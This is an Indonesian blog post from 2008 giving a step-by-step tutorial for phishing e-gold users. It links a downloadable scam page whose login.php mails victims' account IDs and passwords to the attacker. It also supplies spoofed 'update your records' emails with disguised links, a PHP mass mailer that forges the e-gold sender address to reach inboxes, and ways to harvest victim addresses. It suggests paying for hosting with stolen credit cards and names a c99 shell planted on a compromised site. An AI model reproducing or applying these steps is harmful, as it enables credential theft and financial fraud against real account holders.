Bila anda bingung dengan judul di atas, mungkin anda lebih familiar dengan kata-kata berikut : "Tutorial mencuri e-gold", "Tutorial hack e-gold". Tapi, saya sendiri kurang suka dengan kata-kata hack e-gold, karena terdengar kurang pantas saja bila menggunakan kata hack. Di tutorial ini, kita akan membuat situs e-gold yang palsu, dan kemudian mengundang para korban untuk login ke situs e-gold palsu milik kita sehingga semua data yang di-input oleh sang korban akan dikirim ke e-mail kita. Tutorial ini diutamakan untuk pemula, yang medium dan advanced -pun boleh membacanya walau hanya untuk sekedar menghabiskan waktu atau sekedar memaki tutorial ini (*atau penulisnya). Tutorial ini hanyalah sebagai pengetahuan semata, segala kerugian yang diakibatkan oleh artikel ini, bukan tanggung jawab penulis.
Hal-hal yang harus dipersiapkan kurang lebih sebagai berikut :
- Web Hosting / Host / PHP Shell / cPanel atau istilah lainnya yang mendukung PHP.
Banyak orang di luar sana yang menggunakan istilah demikian, cpanel, host, php shell atau apalah. Intinya yang kita butuhkan adalah sebuah web hosting dengan dukungan php. Beruntunglah bagi anda yang sering bermain-main dengan php shell, atau mungkin mengutak-atik web sendiri. Karena anda tidak perlu bersusah payah untuk menempatkan situs e-gold anda nantinya atau bila masih kesulitan, setidaknya tahu bagaimana cara mendapatkannya. Namun, jika anda yang masih kesulitan dan belum mengerti bagaimana untuk mendapatkan web hosting sebagai tempat situs e-gold palsu, sepertinya anda harus sedikit bekerja keras untuk mendapatkannya, bisa meminta, berusaha mencari sendiri, atau bagaimanalah. Tapi yang jelas, saya tidak akan memberitahu caranya secara detail di sini, karena sudah banyak situs-situs berbahasa indonesia yang menyediakan cara untuk mendapatkan php shell, cpanel dsb. Atau, anda bisa juga menggunakan CC (Credit Card) untuk memesan web host secara online. Atau cara lain ? Silahkan berfantasi dengan kreativitas anda. Dan jangan lupa, yang terpenting adalah mendukung PHP dan bisa digunakan untuk mengirim e-mail.
Nah, untuk menjebak korban masuk ke dalam lubang jebakan sudah dimulai. Lubang jebakannya sudah disiapkan, lalu ?
- E-gold scampage
Agar korban mau masuk ke dalam lubang jebakan yang kita buat, kita harus membuat lubang jebakan tersebut tidak terlihat seperti lubang jebakan, namun terlihat biasa saja. Kira-kira seperti itulah fungsi scampage ini, dan menurut pendapat pribadi scampage adalah duplikat dari situs asli dan mengedit beberapa bagian sesuai kebutuhan/penipuan atau simple-nya duplikasi situs untuk menipu. Scampage ini merupakan scampage bikinan saya sendiri (*makanya jelek), yang merupakan komposisi dari, situs asli www.e-gold.com, dan menggunakan beberapa campuran script dari scampage yang dibuat oleh phiser lain, namun tidak di-update sehingga tampilannya tidak lagi terlihat seperti situs asli.
Download e-gold scampage di :
http://geocities.com/th3sn0wbr4in/egoldscampage.zip
Setelah anda men-download egoldscampage.zip ke komputer anda, extract file egoldscampage.zip dan edit file login.php dan login1.php yang terletak di folder www.egold.comacct.
Pada bagian $to = "your@e-mail.com"; ganti your@e-mail.com dengan e-mail anda yang nanti akan digunakan untuk menampung accountID + password e-gold dari korban-korban anda. Begitu juga pada file login1.php, ganti your@e-mail.com dengan e-mail anda yang nanti akan digunakan untuk menampung e-mail + password si korban.
Simpan semua perubahan yang sudah anda lakukan, dan sekarang upload file egoldscampage.zip ke Web Hosting yang sudah anda siapkan sebelumnya dan extract file egoldscampage.zip di Web hosting anda.
- E-mail palsu
Anda memasuki zona terlarang!!! Lewat sini agar anda selamat - TTD, Warga Sekitar. Kira-kira seperti itulah papan yang terpampang ketika anda sedang melewati daerah asing. Orang yang belum mengenal betul daerah tersebut, pasti akan mengikuti petunjuk jalan yang diberikan, apalagi ada tanda bahwa informasi ini berasal dari orang sekitar. Bagi yang panik, tentu mereka tidak lagi berpikir panjang dan langsung mengikuti petunjuk yang ada, sehingga mereka terjebak ke dalam lubang yang kita buat.
Kurang lebih, begitulah fungsi si 'e-mail palsu'. Berikut ini adalah dua buah e-mail palsu yang mungkin bisa anda gunakan.
http://geocities.com/th3sn0wbr4in/gold-letter-1.txt
http://geocities.com/th3sn0wbr4in/gold-letter-2.txt
Untuk gold-letter-1.txt, ada bagian yang harus anda ubah sebelum e-mail tersebut dikirimkan ke korban.
Please update your records on or before October 5th, 2007.
Ganti October 5th, 2007 dengan tanggal 3-5 hari kemudian ketika anda mengirimkan e-mail palsu. Misalnya, anda mengirim e-mail tersebut pada tanggal 1 October 2007, anda ganti menjadi 3-5 hari ke depan sebagai tenggang waktu untuk sang korban.
Pada gold-letter tersebut, ada 4 bagian yaitu : From, Name, Subject, dan Message. Keempat-nya ini akan digunakan pada Inbox Mailer nanti. Jika anda ingin melihat preview e-mail tersebut, copy-paste Message dari letter tersebut ke notepad, dan save sebagai file html. Di setiap e-mail tersebut, terdapat sebuah link yang akan mengarahkan korban ke situs e-gold milik anda.
Contoh pada gold-letter-1.txt, jika anda melihat preview dari e-mail tersebut, isinya adalah demikian :
To update your E-gold records click on the following link:
https://www.e-gold.com/acct/login.html
Namun, bila anda melihat html code-nya, isinya adalah demikian :
To update your E-gold records click on the following link:
https://www.e-gold.com/acct/login.html
Jadi, link https://www.e-gold.com/acct/login.html sebenarnya mengarah ke http://www.modelbc.de/administrator/modules/www.e-gold.com/acct/login.html yang merupakan 'lubang jebakan' milik th3sn0wbr4in. Ganti http://www.modelbc.de/administrator/modules/www.e-gold.com/acct/login.html dengan alamat situs e-gold milik anda sendiri yang sudah anda persiapkan.
Berikut ini, contoh e-mail gold-letter-1 di inbox yahoo milik saya
http://i189.photobucket.com/albums/z55/ianis01/contentmailno4.png
- PHP Inbox Mass Mailer
Sayangnya, kedua gold-letter tersebut barulah desain. Selama e-mail tersebut masih berada di komputer lokal, tidak ada korban yang bisa melihatnya sehingga tidak satupun terjebak masuk ke dalam jebakan yang sudah anda siapkan. Agar 'para korban' melihat e-mail tersebut, anda harus mengirimkan e-mail ke korban.
Dan bila anda ingin korban anda 'melihat' e-mail tersebut, e-mail anda harus tiba di Inbox sang korban, bukan Bulk, Spam, Junk atau istilah lainnya, karena jarang korban yang mau melihat e-mail yang tiba di kategori-kategori tersebut (Bulk, Spam, Junk, etc) walaupun memang ada, tapi tidak banyak.
Karena itu, anda harus menggunakan PHP Inbox Mass Mailer, merupakan sebuah script PHP yang digunakan untuk mengirimkan e-mail secara massal ke korban.
Contoh tampilannya adalah sebagai berikut :
http://i189.photobucket.com/albums/z55/ianis01/mailergl3.png
Isi field Your Email, Your Name, Subject, dan Message seperti yang tertera pada gold-letter-1 atau gold-letter-2, tapi isi dengan gold-letter yang sudah anda edit.
Script php inbox mass mailer :
http://geocities.com/th3sn0wbr4in/mailer.txt
http://geocities.com/th3sn0wbr4in/mailer.arif.txt
Untuk script mailer.arif.txt, didapat dari teman yang original link-nya adalah
http://geocities.com/aliif_1604/run.txt
Agar anda bisa menggunakan PHP Inbox Mass Mailer, anda harus meng-upload-nya ke Web Hosting yang mendukung PHP dan mengirim mail. Sekarang bagaimana caranya agar e-mail tersebut masuk inbox, itu tergantung pada Web Hosting tempat anda meng-upload script mailer-nya. Tidak semua host yang bisa mengirim mail tapi tiba di inbox. Apalagi, kita menggunakan AccountRobot_donotreply@e-gold.com sebagai e-mail pengirim. Bagaimana caranya mengetahui apakah host bisa mengirim e-mail dan tiba di inbox ? Cukup upload script mailer, dan coba anda kirim ke e-mail anda sendiri. Apabila anda mendapatkan e-mail palsu anda tiba di inbox, berarti host tersebut layak digunakan untuk mengirim e-mail e-mail palsu ke korban. Pengalaman pribadi saya sendiri, bagian inilah yang paling sulit. Sejak beberapa tahun yang lalu saya sudah menyiapkan semua yang saya butuhkan untuk membuat jebakan ini, tapi selalu terhenti karena belum juga mendapatkan host yang layak untuk mengirimkan e-mail palsu ke korban. Awalnya saya pikir tidak mungkin mendapatkan host yang bisa mengubah alamat pengirim menjadi seperti AccountRobot_donotreply@e-gold.com. Tapi pada akhir tahun 2006, seorang teman yang memiliki Yahoo! ID tommyhacku memberikan saya sebuah host yang bisa melakukannya.
Jadi, selamat berjuang untuk mendapatkannya. Bila anda sudah mendapatkannya, saat-nya mengumpulkan daftar korban.
- E-mail list
Tentukan siapa korbanmu!!! Bagaimana mengetahui e-mail orang yang memiliki e-gold account?
- Cari dari forum-forum yang berbicara soal e-gold, paypal, atau business
- Cari dari situs-situs HYIP
Tapi sepertinya yang demikian itu cukup sulit. Jadi, kita tidak perlu e-mail yang mana yang mempunyai e-gold account. Masukkan saja semua daftar e-mail ke dalam field target di PHP Mailer. Beberapa cara yang bisa didapatkan untuk mendapatkan e-mail list :
- Beli lewat situs-situs yang menjualnya menggunakan CC. Anda bisa menggunakan keyword "buy e-mail leads" atau keyword lainnya lewat google. Silahkan dicoba-coba keyword lainnya.
- Menggunakan software e-mail extractor
Salah satu software yang terkenal untuk mengumpulkan e-mail adalah Tarantula.
Download software-nya di http://www.emailsmartz.com/downloads/tarantula.exe
Download Patch Tarantula di http://www.geocities.com/toemenggoeng/error/Patch-Tarantula-SG.zip
Jangan tanya saya untuk menggunakannya. Silahkan coba-coba sendiri
- Action!!!
Setelah semua siap, silahkan kirim e-mail palsu ke daftar korban lewat php mailer anda dan tunggu hasilnya di e-mail anda.
Secara simple, yang dibutuhkan adalah :
- Host, yang belum punya boleh nyoba http://modelbc.de/administrator/modules/index_page.php (c99 shell)
- Scampage, source : http://geocities.com/th3sn0wbr4in/egoldscampage.zip
- Mailer + Host utk Mailer, source : http://geocities.com/th3sn0wbr4in/mailer.txt
- Mail list
Friday, November 14, 2008
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment